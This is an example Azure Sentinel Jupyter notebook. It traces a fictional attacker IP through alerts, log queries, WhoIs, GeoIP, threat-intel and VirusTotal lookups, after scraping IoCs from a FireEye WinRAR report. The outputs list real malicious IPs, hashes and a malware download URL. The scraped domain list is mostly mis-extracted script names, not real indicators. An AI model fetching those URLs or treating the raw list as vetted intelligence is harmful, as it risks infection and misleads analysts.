Title: Sample Hunting and Investigation in Jupyter

Linux, Windows, Network and Office data

Notebook Version: 1.0
[Platform Requirements](#platform_reqs)

Description:

This is an example notebook demonstrating techniques to trace the path of an attacker in an organization. Most of the steps use relatively simple Log Analytics queries but it also includes a few more advanced procedures such as:

  • Unpacking and decoding Linux Audit logs
  • Clustering events to collapse repetitive items
  • Various visualizations

Technically, the narrative in this notebook is more an investigation than hunting, since the starting point is an alert rather than threat intelligence. However, many of the techniques here - such as investigating process activity on Linux and Windows hosts, or establishing communication patterns via network analysis - are applicable to hunting scenarios as well.

The Investigation Narrative

From an initial alert (or suspect IP address), examine activity on a Linux host, a Windows host and an Office subscription. Discover malicious activity related to the IP address in each of these.

Warning: Example Notebook - Not for production use!

This notebook is meant to be illustrative of specific scenarios and is not actively maintained. It is unlikely to be runnable directly in your environment. Instead, please use the notebooks in the root of this repo.

Contents

Setup

Make sure that you have installed the packages specified in the setup (uncomment the lines to execute them).

Install Packages

If this is the first time running any of the Azure Sentinel notebooks, you should run the ConfiguringNotebookEnvironment notebook before continuing with this one. If you are just viewing the notebook, this is not necessary.

Import Packages

Once packages are installed run the next cell to import them.

In [1]:
# Imports
import sys
import warnings

MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

import numpy as np
from IPython import get_ipython
from IPython.display import display, HTML, Markdown
import ipywidgets as widgets

import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
import networkx as nx

import pandas as pd
pd.set_option('display.max_rows', 100)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 300)

import msticpy.sectools as sectools
import msticpy.nbtools as nbtools
import msticpy.nbtools.entityschema as entity
import msticpy.nbtools.kql as qry
import msticpy.nbtools.nbdisplay as nbdisp

# Some of our dependencies (networkx) still use deprecated Matplotlib
# APIs - we can't do anything about it so suppress them from view
from matplotlib import MatplotlibDeprecationWarning
warnings.simplefilter("ignore", category=MatplotlibDeprecationWarning)

WIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),
                   'style': {'description_width': 'initial'}}
display(HTML(nbtools.util._TOGGLE_CODE_PREPARE_STR))

from collections import OrderedDict

# Create an observation collector list
from collections import namedtuple
Observation = namedtuple('Observation', ['caption', 'description', 'item', 'link'])
observation_list = OrderedDict()
def display_observation(observation):
    display(Markdown(f'### {observation.caption}'))
    display(Markdown(observation.description))
    display(Markdown(f'[Go to details](#{observation.link})'))
    display(observation.item)

def add_observation(observation):
    observation_list[observation.caption] = observation
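As a quick illustration of how this collector can be used (a hedged, self-contained sketch - the caption, item and link values here are invented, and the collector is re-created locally so the snippet runs on its own):

```python
from collections import OrderedDict, namedtuple

# Re-create the collector from the cell above so this sketch is self-contained
Observation = namedtuple('Observation', ['caption', 'description', 'item', 'link'])
observation_list = OrderedDict()

obs = Observation(caption='Suspicious C2 IP',
                  description='IP address seen in both the alert and the TI feed.',
                  item='23.97.60.214',
                  link='c2_search')
observation_list[obs.caption] = obs  # equivalent to add_observation(obs)

print(observation_list['Suspicious C2 IP'].item)  # -> 23.97.60.214
```

In the notebook itself you would call `add_observation(obs)` as you find items of interest, then render them at the end with `display_observation`.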

Contents

Part 1 - Threat Intel Report


Getting IoC IP Addresses

Threat intelligence is a vital tool in the armory of hunters and security investigators. Many companies subscribe to threat intelligence feeds from providers such as Team Cymru, FireEye, CrowdStrike and others (Azure Sentinel customers can use these data subscriptions to enhance the alerts and queries used in Azure Sentinel). In other cases your threat intel may arrive via a CERT notification or a tip-off about suspicious activity via email.

For the purposes of this notebook, and to make it more accessible to those who don't have ready access to a threat intelligence feed, we're going to scrape some threat intelligence Indicators of Compromise (IoCs) from a public report.

Let's pick a recent report from FireEye WinRAR Zero-day Abused in Multiple Campaigns by Dileep Kumar Jallepalli.

The content of this report is not directly relevant to our investigation - we're just using it as an example of something that you might receive and want to check against your organization for any of the Indicators of Compromise (IoCs) it lists. I would stress that this is not a recommended way to consume threat intelligence data from FireEye or any other company and is only done here to provide a starting point for the notebook and accompanying blog. For one thing, you may be violating the company's terms of service and, for another, the threat intel listed in these types of reports represents a tiny fraction of the data that these companies provide as part of a commercial agreement.

In [2]:
# This report could equally be an email or some other text that you want to retrieve IoCs from.
import requests
url = 'https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html'
response = requests.get(url)
if response.status_code != 200:
    print('Url request failed')

# We want to extract IoCs from this report
# FireEye lists domains and IPs with the final dot obfuscated - possibly to deter people from doing what I'm doing here.
# My apologies to FireEye in advance
ip_iocs = str(response.content).replace('[.]', '.')

We want to quickly extract relevant IoCs from reports and emails. Although this isn't the original purpose of the module, we can use IoCExtract to help us do this.

In [3]:
from msticpy.sectools import IoCExtract
ioc_extr = IoCExtract()

help(IoCExtract)
Help on class IoCExtract in module msticpy.sectools.iocextract:

class IoCExtract(builtins.object)
 |  IoC Extractor - looks for common IoC patterns in input strings.
 |  
 |  The extract() method takes either a string or a pandas DataFrame
 |  as input. When using the string option as an input extract will
 |  return a dictionary of results. When using a DataFrame the results
 |  will be returned as a new DataFrame with the following columns:
 |  IoCType: the mnemonic used to distinguish different IoC Types
 |  Observable: the actual value of the observable
 |  SourceIndex: the index of the row in the input DataFrame from
 |  which the source for the IoC observable was extracted.
 |  
 |  The class has a number of built-in IoC regex definitions.
 |  These can be retrieved using the ioc_types attribute.
 |  
 |  Addition IoC definitions can be added using the add_ioc_type
 |  method.
 |  
 |  Note: due to some ambiguity in the regular expression patterns
 |  for different types and observable may be returned assigned to
 |  multiple observable types. E.g. 192.168.0.1 is a also a legal file
 |  name in both Linux and Windows. Linux file names have a particularly
 |  large scope in terms of legal characters so it will be quite common
 |  to see other IoC observables (or parts of them) returned as a
 |  possible linux path.
 |  
 |  Methods defined here:
 |  
 |  __init__(self)
 |      Intialize new instance of IoCExtract.
 |  
 |  add_ioc_type(self, ioc_type: str, ioc_regex: str, priority: int = 0, group: str = None)
 |      Add an IoC type and regular expression to use to the built-in set.
 |      
 |      Parameters
 |      ----------
 |      ioc_type : str
 |          A unique name for the IoC type
 |      ioc_regex : str
 |          A regular expression used to search for the type
 |      priority : int, optional
 |          Priority of the regex match vs. other ioc_patterns. 0 is
 |          the highest priority (the default is 0).
 |      group : str, optional
 |          The regex group to match (the default is None,
 |          which will match on the whole expression)
 |      
 |      Notes
 |      -----
 |      Pattern priorities.
 |          If two IocType patterns match on the same substring, the matched
 |          substring is assigned to the pattern/IocType with the highest
 |          priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`
 |          and `linux_path` but since `dns` has a higher priority, the expression
 |          is assigned to the `dns` matches.
 |  
 |  extract(self, src: str = None, data: pandas.core.frame.DataFrame = None, columns: List[str] = None, os_family='Windows', ioc_types: List[str] = None, include_paths: bool = False) -> Any
 |      Extract IoCs from either a string or pandas DataFrame.
 |      
 |      Parameters
 |      ----------
 |      src : str, optional
 |          source string in which to look for IoC patterns
 |          (the default is None)
 |      data : pd.DataFrame, optional
 |          input DataFrame from which to read source strings
 |          (the default is None)
 |      columns : list, optional
 |          The list of columns to use as source strings,
 |          if the `data` parameter is used. (the default is None)
 |      os_family : str, optional
 |          'Linux' or 'Windows' (the default is 'Windows'). This
 |          is used to toggle between Windows or Linux path matching.
 |      ioc_types : list, optional
 |          Restrict matching to just specified types.
 |          (default is all types)
 |      include_paths : bool, optional
 |          Whether to include path matches (which can be noisy)
 |          (the default is false - excludes 'windows_path'
 |          and 'linux_path'). If `ioc_types` is specified
 |          this parameter is ignored.
 |      
 |      Returns
 |      -------
 |      Any
 |          dict of found observables (if input is a string) or
 |          DataFrame of observables
 |      
 |      Notes
 |      -----
 |      Extract takes either a string or a pandas DataFrame as input.
 |      When using the string option as an input extract will
 |      return a dictionary of results.
 |      When using a DataFrame the results will be returned as a new
 |      DataFrame with the following columns:
 |      - IoCType: the mnemonic used to distinguish different IoC Types
 |      - Observable: the actual value of the observable
 |      - SourceIndex: the index of the row in the input DataFrame from
 |      which the source for the IoC observable was extracted.
 |      
 |      IoCType Pattern selection
 |      The default list is:  ['ipv4', 'ipv6', 'dns', 'url',
 |      'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
 |      user-defined types.
 |      'windows_path', 'linux_path' are excluded unless `include_paths`
 |      is True or explicitly included in `ioc_paths`.
 |  
 |  validate(self, input_str: str, ioc_type: str) -> bool
 |      Check that `input_str` matches the regex for the specificed `ioc_type`.
 |      
 |      Parameters
 |      ----------
 |      input_str : str
 |          the string to test
 |      ioc_type : str
 |          the regex pattern to use
 |      
 |      Returns
 |      -------
 |      bool
 |          True if match.
 |  
 |  ----------------------------------------------------------------------
 |  Data descriptors defined here:
 |  
 |  __dict__
 |      dictionary for instance variables (if defined)
 |  
 |  __weakref__
 |      list of weak references to the object (if defined)
 |  
 |  ioc_types
 |      Return the current set of IoC types and regular expressions.
 |      
 |      Returns
 |      -------
 |      dict
 |          dict of IoC Type names and regular expressions
 |  
 |  ----------------------------------------------------------------------
 |  Data and other attributes defined here:
 |  
 |  DNS_REGEX = r'((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){2,}[a-z]...
 |  
 |  IPV4_REGEX = r'(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})'
 |  
 |  IPV6_REGEX = r'(?<![:.\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\w])...
 |  
 |  LXPATH_REGEX = '(?P<root>/+||[.]+)\n            (?P<folder>/(?:[^...|\...
 |  
 |  MD5_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0...
 |  
 |  SHA1_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f...
 |  
 |  SHA256_REGEX = '(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa...
 |  
 |  URL_REGEX = "\n            (?P<protocol>(https?|ftp|telnet|lda...nt>([...
 |  
 |  WINPATH_REGEX = '\n            (?P<root>[a-z]:|\\\\\\\\[a-z0-9_.$-]+||...
 |  
 |  __annotations__ = {'_content_regex': typing.Dict[str, msticpy.sectools...
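To illustrate the kind of matching that IoCExtract performs internally, here is a minimal stdlib-only sketch using the IPV4_REGEX pattern listed in the class attributes above (the sample text is invented; this is just a demonstration of the pattern, not the class itself):

```python
import re

# IPV4_REGEX as shown in the IoCExtract class attributes
IPV4_REGEX = r'(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})'

text = 'Beaconing to 185.49.71.101 with fallback to 47.91.56.21'
matches = [m.group('ipaddress') for m in re.finditer(IPV4_REGEX, text)]
print(matches)  # -> ['185.49.71.101', '47.91.56.21']
```

The real class layers on top of this: priority resolution between overlapping patterns (as described under `add_ioc_type`) and DataFrame-aware input handling.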

In [4]:
iocs_found = ioc_extr.extract(src=ip_iocs, ioc_types=['ipv4', 'url', 'dns', 'md5_hash', 'sha1_hash'])
if 'ipv4' in iocs_found:
    print('IPs in report')
    for item in iocs_found['ipv4']:
        print(f'\t{item}')
if 'url' in iocs_found:
    print('Urls in report')
    for item in (url for url in iocs_found['url'] if 'fireeye' not in url.lower()):
        print(f'\t{item}')
if 'md5_hash' in iocs_found:
    print('MD5 Hashes in report')
    for item in iocs_found['md5_hash']:
        print(f'\t{item}')
if 'dns' in iocs_found:
    print('Domains in report')
    for item in (dns for dns in iocs_found['dns'] if 'fireeye' not in dns.lower()):
        print(f'\t{item}')
IPs in report
	185.49.71.101
	47.91.56.21
	103.225.168.159
	31.148.220.53
	89.34.111.113
	185.162.131.92
Urls in report
	https://twitter.com/360TIC/status/1101022904156741632
	http://tiny-share.com/direct/7dae2d144dae4447a152bef586520ef8
	http://schema.org/ListItem
	http://schema.org/Person
	http://schema.org/BlogPosting
	https://www.win-rar.com/start.html
	https://schema.org/Brand
	http://schema.org/BreadcrumbList
	https://ti.360.net/blog/articles/upgrades-in-winrar-exploit-with-social-engineering-and-encryption/
	https://www.cswe.org/getattachment/Accreditation/Accreditation-Process/Candidacy-Eligibility-Application-Help-Document.pdf.aspx
	http://schema.org/WPHeader
	https://itunes.apple.com/us/podcast/eye-on-security/id1073779629?mt=2
	https://cloud.typography.com/6746836/6977592/css/fonts.css
	https://research.checkpoint.com/extracting-code-execution-from-winrar/
	http://schema.org/WebPage
MD5 Hashes in report
	2961C52F04B7FDF7CCF6C01AC259D767
	96986B18A8470F4020EA78DF0B3DB7D4
	3aabc9767d02c75ef44df6305bc6a41f
	79B53B4555C1FB39BA3C7B8CE9A4287E
	9b81b3174c9b699f594d725cf89ffaa4
	f36404fb24a640b40e2d43c72c18e66b
	7dae2d144dae4447a152bef586520ef8
	31718d7b9b3261688688bdc4e026db99
	062801f6fdbda4dd67b77834c62e82a4
	719d34d31c8e3a6e6fffd425f7e032f3
	9b19753369b6ed1187159b95fc8a81cd
	8e067e4cda99299b0bf2481cc1fd8e12
	12def981952667740eb06ee91168e643
	0f56b04a4e9a0df94c7f89c1bccf830c
	dc63d5affde0db95128dac52f9d19578
	914ac7ecf2557d5836f26a151c1b9b62
	119A0FD733BC1A013B0D4399112B8626
	1f5fa51ac9517d70f136e187d45f69de
	97D74671D0489071BAA21F38F456EB74
	eca09fe8dcbc9d1c097277f2b3ef1081
	49419d84076b13e96540fdd911f1c2f0
	1BA398B0A14328B9604EEB5EBF139B40
	8c93e024fc194f520e4e72e761c0942d
	1322340356018696d853e0ac6f7ce3a2
	BCC49643833A4D8545ED4145FB6FDFD2
	AAC00312A961E81C4AF4664C49B4A2B2
	e9815dfb90776ab449539a2be7c16de5
Domains in report
	www.facebook.com
	csrf.min.js
	fw.min.js
	c09.c09v1.has
	ti.360.net
	6si.min.js
	s7.addthis.com
	Heur.BZC.ONG.Boxter
	utils.min.js
	www.khuyay.org
	Trojan.Win.Azorult
	itunes.apple.com
	fdc.blog.replaceFormWithThankYou
	fw.min.css
	redesign-2018.min.css
	www.win-rar.com
	Exploit.ACE-PathTraversal.Gen
	www.alahbabgroup.com
	Analytics.ClientContextUtils.init
	s.className.replace
	tags.tiqcdn.com
	window.Granite.csrf
	Thumbs.db.lnk
	Candidacy-Eligibility-Application-Help-Document.pdf.aspx
	Trojan.Agent.DPAS
	window.location.href
	geoipResponse.country.iso
	a.parentNode.insertBefore
	Picture7.5.png
	forms2.min.js
	fdc.blog.initCheckboxes
	data.blogs.length
	String.prototype.indexOf.apply
	kernel.min.js
	j.6sc.co
	fdc.geoipResponse.country.iso
	jquery.min.js
	String.prototype.includes
	cloud.typography.com
	www.cswe.org
	Exploit.Agent.VA
	base.min.css
	elem.parentNode.insertBefore
	b.6sc.co
	fdc.geoipResponse.country
	www.youtube.com
	s.parentNode.insertBefore
	shared.min.js
	vnd.microsoft.icon
	nav.min.js
	Generic.MSIL.PasswordStealerA
	modern.min.js
	www.linkedin.com
	Exploit.Agent.UZ
	research.checkpoint.com
	Analytics.SegmentMgr.loadSegments
	granite.min.js
	window.location.pathname

At this point we're going to cheat a little (I said earlier that the FireEye report was not related to the notebook). We will take the list of IPs from the report and add in the IP address of our fictional attacker.

In [5]:
c2_ips = list(iocs_found['ipv4'])
c2_ips.append('23.97.60.214')
c2_ips
Out[5]:
['185.49.71.101',
 '47.91.56.21',
 '103.225.168.159',
 '31.148.220.53',
 '89.34.111.113',
 '185.162.131.92',
 '23.97.60.214']

Authenticate to Azure Sentinel

Get the Workspace ID

To find your Workspace Id go to Log Analytics. Look at the workspace properties to find the ID.

In [6]:
import os
from msticpy.nbtools.wsconfig import WorkspaceConfig
ws_config_file = 'config.json'

WORKSPACE_ID = None
TENANT_ID = None
try:
    ws_config = WorkspaceConfig(ws_config_file)
    display(Markdown(f'Read Workspace configuration from local config.json '
                     f'for workspace **{ws_config["workspace_name"]}**'))
    for cf_item in ['tenant_id', 'subscription_id', 'resource_group',
                    'workspace_id', 'workspace_name']:
        display(Markdown(f'**{cf_item.upper()}**: {ws_config[cf_item]}'))
                     
    if ('cookiecutter' not in ws_config['workspace_id'] or
            'cookiecutter' not in ws_config['tenant_id']):
        WORKSPACE_ID = ws_config['workspace_id']
        TENANT_ID = ws_config['tenant_id']
except Exception:
    pass

if not WORKSPACE_ID or not TENANT_ID:
    display(Markdown('**Workspace configuration not found.**\n\n'
                     'Please go to your Log Analytics workspace, copy the workspace ID'
                     ' and/or tenant Id and paste here.<br> '
                     'Or read the workspace_id from the config.json '
                     'in your Azure Notebooks project.'))
    ws_config = None
    ws_id = nbtools.GetEnvironmentKey(env_var='WORKSPACE_ID',
                                      prompt='Please enter your Log Analytics Workspace Id:',
                                      auto_display=True)
    ten_id = nbtools.GetEnvironmentKey(env_var='TENANT_ID',
                                       prompt='Please enter your Log Analytics Tenant Id:',
                                       auto_display=True)

Read Workspace configuration from local config.json for workspace {{cookiecutter.workspace_name}}

TENANT_ID: 72f988bf-86f1-41af-91ab-2d7cd011db47

SUBSCRIPTION_ID: {{cookiecutter.subscription_id}}

RESOURCE_GROUP: {{cookiecutter.resource_group}}

WORKSPACE_ID: 52b1ab41-869e-4138-9e40-2a4457f09bf0

WORKSPACE_NAME: {{cookiecutter.workspace_name}}

Authenticate to Log Analytics

If you are using user/device authentication, run the following cell.

  • Click the 'Copy code to clipboard and authenticate' button.
  • This will pop up an Azure Active Directory authentication dialog (in a new tab or browser window). The device code will have been copied to the clipboard.
  • Select the text box and paste (Ctrl-V/Cmd-V) the copied value.
  • You should then be redirected to a user authentication page where you should authenticate with a user account that has permission to query your Log Analytics workspace.

Use the following syntax if you are authenticating using an Azure Active Directory AppId and Secret:

%kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(client_id).clientsecret(client_secret)

instead of

%kql loganalytics://code().workspace(WORKSPACE_ID)

Note: you may occasionally see a JavaScript error displayed at the end of the authentication - you can safely ignore this.
On successful authentication you should see a popup schema button.

In [7]:
if not WORKSPACE_ID or not TENANT_ID:
    try:
        WORKSPACE_ID = ws_id.value
        TENANT_ID = ten_id.value
    except NameError:
        raise ValueError('No workspace or Tenant Id.')

nbtools.kql.load_kql_magic()
%kql loganalytics://code().tenant(TENANT_ID).workspace(WORKSPACE_ID)

Contents

Search for C2


Set Query Time Range

Specify a time range to search for alerts. Once this is set, run the following cell to retrieve any alerts in that time window. You can change the time range and re-run the queries until you find the alerts that you want.

In [11]:
from datetime import datetime
search_origin = datetime(2019, 2, 18)
search_q_times = nbtools.QueryTime(units='day', max_before=20,
                                   before=1, max_after=1, origin_time=search_origin)
search_q_times.display()
In [15]:
# Let's query our Azure Sentinel data to see if any records 
# contain any of these IPs and print which tables we find them
# in.

query_template = '''
search "{ip_addr}"
| where TimeGenerated >= datetime({start})
| where TimeGenerated <= datetime({end})
| summarize count() by Type
'''

# Using search repeatedly like this is a bit inefficient - you can get a quick indicator 
# if there are any matches with the syntax:
# search "ipaddr1" or "ipaddr2" or ....
# but if there are matches this doesn't tell you which IP matched.
for ip in c2_ips:
    query = query_template.format(ip_addr=ip,
                                  start=search_q_times.start,
                                  end=search_q_times.end)
    df, result = qry.exec_query_string(query)
    print(f'Searching for ip {ip}...', end=' ')
    if df is not None and not df.empty:
        print(f'Found results for {ip}:')
        display(df)
    else:
        print('no matches found')
Searching for ip 185.49.71.101... no matches found
Searching for ip 47.91.56.21... no matches found
Searching for ip 103.225.168.159... no matches found
Searching for ip 31.148.220.53... no matches found
Searching for ip 89.34.111.113... no matches found
Searching for ip 185.162.131.92... no matches found
Searching for ip 23.97.60.214... Found results for 23.97.60.214:
Type count_
0 SecurityAlert 14
1 SecurityDetection 1
2 AzureActivity 1
3 Syslog 1
4 SSHAlertDataV2_CL 3
5 BYOThreatIntelv1_CL 1
6 AuditLog_CL 7
7 AzureNetworkAnalytics_CL 90
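The combined-search shortcut mentioned in the code comment above can be sketched like this (a hedged example: it just builds the single query string from the IP list; the time filter is omitted for brevity and the list shown is a subset):

```python
# Build one `search` query covering all IPs at once - a quick first pass,
# though a hit won't tell you which IP matched.
c2_ips = ['185.49.71.101', '47.91.56.21', '23.97.60.214']  # example subset

combined_terms = ' or '.join(f'"{ip}"' for ip in c2_ips)
combined_query = f'search {combined_terms}\n| summarize count() by Type'
print(combined_query)
```

If this quick pass returns any rows, you can fall back to the per-IP loop above to identify which address matched.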

We can see that we have 14 alerts in that period that match the final IP in the list. Let's have a look at those.

In [24]:
# list_alerts_counts groups the alerts by alert type
alert_counts = qry.list_alerts_counts(provs=[search_q_times])
alert_list = qry.list_alerts(provs=[search_q_times])
print(len(alert_counts), ' distinct alert types')
print(len(alert_list), ' distinct alerts')
display(HTML('<h2>Top alerts</h2>'))
display(alert_list[['AlertName', 'CompromisedEntity', 'TenantId']]
        .groupby(['AlertName', 'CompromisedEntity'])
        .count()
        .rename(columns={'TenantId':'Count'}))
3  distinct alert types
19  distinct alerts

Top alerts

Count
AlertName CompromisedEntity
Detected suspicious file download MSTICALERTSLXVM2 1
SSH Anomalous Login ML 18

Contents

Examine an Alert

Pick an alert from a list of retrieved alerts.

This section extracts the alert information and entities into a SecurityAlert object allowing us to query the properties more reliably.

In particular, we use the alert to automatically provide parameters for queries and UI elements. Subsequent queries will use properties like the host name and derived properties such as the OS family (Linux or Windows) to adapt the query. Query time selectors like the one above will also default to an origin time that matches the alert selected.

The alert view below shows all of the main properties of the alert plus the extended property dictionary (if any) and JSON representations of the Entity.

Select alert from list

As you select an alert, the main properties will be shown below the list.

Use the filter box to narrow down your search to any substring in the AlertName.

In [25]:
security_alert = None
def show_full_alert(selected_alert):
    global security_alert
    security_alert = nbtools.SecurityAlert(alert_select.selected_alert)
    nbtools.disp.display_alert(security_alert, show_entities=True)
alert_select = nbtools.SelectAlert(alerts=alert_list, action=show_full_alert)
alert_select.display()

Looking at the SSH Anomalous logons we can see our IP address as the origin IP. Looking at the one SuspiciousFileDownload alert, we can see (buried in the Process Entity) that the same IP Address was used as the host address from an http download.

Check alert for IP addresses not contained in entities

Additional IP addresses found in alert are shown below.

In [52]:
# We have the IP address already but we can use the same trick as before
# to pass the alert (squashed into a string) to the IoC extractor to fish out 
# anything interesting
ioc_extractor = sectools.IoCExtract()
new_ips = ioc_extractor.extract(src=str(security_alert), ioc_types=['ipv4', 'ipv6'])

alert_ip_entities = [entity.IpAddress(Address=ip) for ip in new_ips.get('ipv4', [])]
print('IPs in alert\n', alert_ip_entities)

c2_ip_entities = [entity.IpAddress(Address=ip) for ip in c2_ips if ip not in new_ips['ipv4']]
print('Remaining C2 IPs\n', c2_ip_entities)
# Since we didn't find any matches for the other IPs in the list
# we'll use the IPAddress entity that we just created for further investigation
IPs in alert
 [{"Address": "23.97.60.214", "Type": "ipaddress"}]
Remaining C2 IPs
 [{"Address": "185.49.71.101", "Type": "ipaddress"}, {"Address": "47.91.56.21", "Type": "ipaddress"}, {"Address": "103.225.168.159", "Type": "ipaddress"}, {"Address": "31.148.220.53", "Type": "ipaddress"}, {"Address": "89.34.111.113", "Type": "ipaddress"}, {"Address": "185.162.131.92", "Type": "ipaddress"}]

Contents

Basic IP Checks

Reverse IP and WhoIs

In [29]:
# reverse DNS lookup
from dns import reversename, resolver
from ipwhois import IPWhois
for src_ip_entity in alert_ip_entities:
    print('IP:', src_ip_entity.Address)
    print('-'*50)
    
    print('Reverse Name Lookup.')
    rev_name = reversename.from_address(src_ip_entity.Address)
    
    print(rev_name)
    try:
        rev_dns = str(resolver.query(rev_name, 'PTR')[0])
        display(rev_dns)
    except Exception:
        print('No reverse addr result')

    print('\nWhoIs Lookup.')
    whois = IPWhois(src_ip_entity.Address)
    whois_result = whois.lookup_whois()
    if whois_result:
        display(whois_result)
    else:
        print('No whois result')
IP: 23.97.60.214
--------------------------------------------------
Reverse Name Lookup.
214.60.97.23.in-addr.arpa.
No reverse addr result

WhoIs Lookup.
{'nir': None,
 'asn_registry': 'arin',
 'asn': '8075',
 'asn_cidr': '23.96.0.0/14',
 'asn_country_code': 'US',
 'asn_date': '2013-06-18',
 'asn_description': 'MICROSOFT-CORP-MSN-AS-BLOCK - Microsoft Corporation, US',
 'query': '23.97.60.214',
 'nets': [{'cidr': '23.96.0.0/13',
   'name': 'MSFT',
   'handle': 'NET-23-96-0-0-1',
   'range': '23.96.0.0 - 23.103.255.255',
   'description': 'Microsoft Corporation',
   'country': 'US',
   'state': 'WA',
   'city': 'Redmond',
   'address': 'One Microsoft Way',
   'postal_code': '98052',
   'emails': ['[email protected]',
    '[email protected]',
    '[email protected]'],
   'created': '2013-06-18',
   'updated': '2013-06-18'}],
 'raw': None,
 'referral': None,
 'raw_referral': None}

Geo IP Lookup

Where does this communication come from?

In [41]:
from msticpy.sectools.geoip import GeoLiteLookup
iplocation = GeoLiteLookup()

for ip_entity in alert_ip_entities:
    if 'Location' not in ip_entity or not ip_entity.Location:
        iplocation.lookup_ip(ip_entity=ip_entity)
    print(ip_entity)
{ 'Address': '23.97.60.214',
  'Location': { 'City': 'Singapore',
                'CountryCode': 'SG',
                'CountryName': 'Singapore',
                'Latitude': 1.2931,
                'Longitude': 103.8558,
                'State': 'Central Singapore Community Development Council',
                'Type': 'geolocation'},
  'Type': 'ipaddress'}
In [43]:
# Why not see it on a map? 
# Clicking on the icon gives you the detail of the IP Address location
from msticpy.nbtools.foliummap import FoliumMap
geo_map = FoliumMap()

geo_map.add_ip_cluster(ip_entities=alert_ip_entities, color='red')

# We can add the other C2 Ips
for ip_entity in c2_ip_entities:
    if 'Location' not in ip_entity or not ip_entity.Location:
        iplocation.lookup_ip(ip_entity=ip_entity)
geo_map.add_ip_cluster(ip_entities=c2_ip_entities, color='purple')
display(geo_map.folium_map)

Contents

Threat Intel - Check the IP Address for known malicious addresses

Lookup in Azure Sentinel Bring-Your-Own-Threat-Intel

In [55]:
# Lookup in Sentinel Bring-Your-Own-Threat-Intel (or IPReputation/Blacklists)
# The TI Kql query - we're substituting the IP address to search for
ti_query = r'''
BYOThreatIntelv1_CL
| where NetworkIP_s == '{ip}'
| project TimeGenerated, ExternalIndicatorId_s, ThreatType_s,
Description_s, Active_s, TrafficLightProtocolLevel_s,
ConfidenceScore_s, ThreatSeverity_s, ExpirationDateTime_t,
IndicatorId_s, NetworkIP_s, Type
'''.format(ip=alert_ip_entities[0].Address)

# run the query, convert to a dataframe and display any result
%kql -query ti_query
ti_query_df = _kql_raw_result_.to_dataframe()
if len(ti_query_df) > 0:
    display(ti_query_df.T)
0
TimeGenerated 2019-02-17 02:54:12.099000
ExternalIndicatorId_s BotnetIndicator1549501989MS525
ThreatType_s Botnet
Description_s This is a botnet indicator generated in RFC5737 documentation space. Take no action on any observables set in this indicator.
Active_s True
TrafficLightProtocolLevel_s Green
ConfidenceScore_s 0
ThreatSeverity_s 0
ExpirationDateTime_t 2019-02-07 02:13:08.525000
IndicatorId_s fe166cf664741ec1c79318971811620e38bf26d69a82e5e1b20953cdaac8a075
NetworkIP_s 23.97.60.214
Type BYOThreatIntelv1_CL

Lookup in VirusTotal

In [45]:
# Get an API key for Virus Total
vt_key = nbtools.GetEnvironmentKey(env_var='VT_API_KEY',
                           help_str='To obtain an API key sign up here https://www.virustotal.com/',
                           prompt='Virus Total API key:')
vt_key.display()
In [51]:
# Lookup the IP Addresses in Virus Total using the msticpy VTLookup class
vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)

# Let's look for our other C2 IPs - we don't expect our simulated attack 
# address to appear in VT.
# Note, because we're using a free VirusTotal API key here we're limited to
# 4 requests per minute so some requests may error out.
for ip in c2_ip_entities:
    vt_lookup.lookup_ioc(observable=ip.Address, ioc_type='ipv4')
vt_lookup.results.dropna(axis='columns')
Error parsing response to JSON: "89.34.111.113", type "ipv4". (Source index 0)
Error parsing response to JSON: "185.162.131.92", type "ipv4". (Source index 0)
Out[51]:
Observable IoCType Status ResponseCode RawResponse SourceIndex VerboseMsg Positives ResolvedDomains DetectedUrls
0 185.49.71.101 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [], "whois": "NetHandle: NET-185-0-0-0-1\nNetType: Allocated to RIPE NCC\nOrganization: RIPE Network Coordination Centre (RIPE)\nUpdated: 2011-02-08\nOrgName: RIPE Network Coordination Centre\nOrgId: RIPE\nCity: Amsterdam\nPostalCode: 1001... 0 IP address in dataset 13 domsnulya.ru, ns1.univer5.ru, ns2.univer5.ru, univer5.ru, vnestandarta.ru, www.domsnulya.ru, www.univer5.ru http://185.49.71.101/i/pwi_crs.exe, http://185.49.71.101/
1 47.91.56.21 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [{"date": "2017-08-23 06:02:41", "positives": 0, "total": 68, "sha256": "6c490ef9ab1426b0dc3aba4bb7d6c89ce9eb7d193fb19e096516c98bdb36829e"}, {"date": "2019-04-01 01:46:26", "positives": 0, "total": 67, "sha256": "2b67da14e2725a72a8cccb22bb... 0 IP address in dataset 12 consumer-api.unltd.menu http://47.91.56.21/, http://47.91.56.21/verify.php%C5%B1, http://47.91.56.21/verify.php, http://47.91.56.21:10080/verify.php
2 103.225.168.159 ipv4 Success 1 {"asn": 9891, "undetected_downloaded_samples": [{"date": "2019-03-29 03:20:20", "positives": 0, "total": 58, "sha256": "4da03da9731938f9e8d345d416a1e8438da8020ea7d840e22cab83a127c485eb"}], "whois": "Domain Name: P5-MANAGEMENT.COM\nRegistry Domain ID: 1834216074_DOMAIN_COM-VRSN\nRegistrar WHOIS S... 0 IP address in dataset 6 com-cover.com http://103.225.168.159/admin/verify.php
